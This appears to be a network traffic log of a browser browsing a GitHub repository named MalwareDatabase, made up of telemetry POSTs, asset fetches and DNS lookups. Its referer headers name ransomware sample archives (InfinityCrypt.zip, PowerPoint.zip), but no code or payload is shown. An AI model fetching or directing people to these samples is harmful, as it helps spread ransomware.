x-github-request-id: F1FB:263E81:1674B91:1E723C3:66426E86
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1060
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002450
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:1674B91:1E723C4:66426E86
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1104
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002672
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:1675466:1E72F79:66426E86
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1089
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.001941
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:1675466:1E72F7A:66426E8D
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1510
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002925
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:1675494:1E72FBD:66426E8D
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1207
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002368
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:1675EFF:1E73DC2:66426E8D
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1108
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002562
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:1676097:1E73FDD:66426E97
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1093
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003595
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:1676097:1E73FDC:66426E95
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1177
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.001948
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:167609E:1E73FE6:66426E97
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1430
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002906
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:1676D46:1E750FD:66426E97
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1148
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002523
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:1677044:1E75515:66426EA1
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1144
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002344
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:167704C:1E7551F:66426EA3
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1129
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003024
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:1677053:1E75526:66426EA3
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1534
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002821
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:167707F:1E75558:66426EA3
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1510
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002912
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:1679109:1E780F6:66426EA4
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1262
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002730
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:167FF37:1E81695:66426EBD
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1163
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/PowerPoint.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003116
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:167FFA0:1E8171E:66426F18
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1138
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/PowerPoint.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002549
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:167FFA1:1E8171F:66426F19
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1123
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/PowerPoint.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003829
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:167FFA1:1E81720:66426F19
-
Remote address:185.199.108.154:443RequestGET /favicons/favicon.svg HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
last-modified: Thu, 19 Oct 2023 22:56:17 GMT
etag: 0x8DBD0F69A3B5496
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 3414964
x-served-by: cache-iad-kiad7000023-IAD, cache-lcy-eglc8600047-LCY
x-cache: HIT, HIT
x-cache-hits: 8, 16747
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 89ba0e787869418ba377876c3a2ba2c871b73da1
content-length: 14426
-
Remote address:185.199.108.154:443RequestGET /assets/apple-touch-icon-144x144-b882e354c005.png HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
last-modified: Thu, 19 Oct 2023 22:56:36 GMT
etag: 0x8DBD0F6A5D50EA4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 137
x-served-by: cache-iad-kiad7000081-IAD, cache-lcy-eglc8600047-LCY
x-cache: HIT, HIT
x-cache-hits: 2066319, 1
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1a66f619cf1b443eb1fc9a639496edfe7f1f138a
content-length: 959
-
Remote address:185.199.108.154:443RequestGET /favicons/favicon.png HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
last-modified: Thu, 19 Oct 2023 22:56:36 GMT
etag: 0x8DBD0F6A5D47312
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 107
x-served-by: cache-iad-kiad7000070-IAD, cache-lcy-eglc8600047-LCY
x-cache: HIT, HIT
x-cache-hits: 3213619, 1
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 527160e0f37e83ba213dc2bf2e4bacc201717ee3
content-length: 958
-
Remote address:185.199.108.154:443RequestGET /images/gravatars/gravatar-user-420.png?size=40 HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
last-modified: Thu, 19 Oct 2023 22:56:36 GMT
etag: 0x8DBD0F6A5F6061B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:29 GMT
age: 147
x-served-by: cache-iad-kiad7000066-IAD, cache-lcy-eglc8600047-LCY
x-cache: HIT, HIT
x-cache-hits: 1543587, 1
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 55c5e71d8502da6cde7dbcad728a189a0fad7c26
content-length: 5065
-
Remote address:8.8.8.8:53Requestapi.github.comIN AResponseapi.github.comIN A20.26.156.210
-
Remote address:8.8.8.8:53Requestapi.github.comIN AResponseapi.github.comIN A20.26.156.210
-
Remote address:8.8.8.8:53Request133.110.199.185.in-addr.arpaIN PTRResponse133.110.199.185.in-addr.arpaIN PTRcdn-185-199-110-133githubcom
-
Remote address:8.8.8.8:53Request133.110.199.185.in-addr.arpaIN PTRResponse133.110.199.185.in-addr.arpaIN PTRcdn-185-199-110-133githubcom
-
Remote address:20.26.156.210:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 60947
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
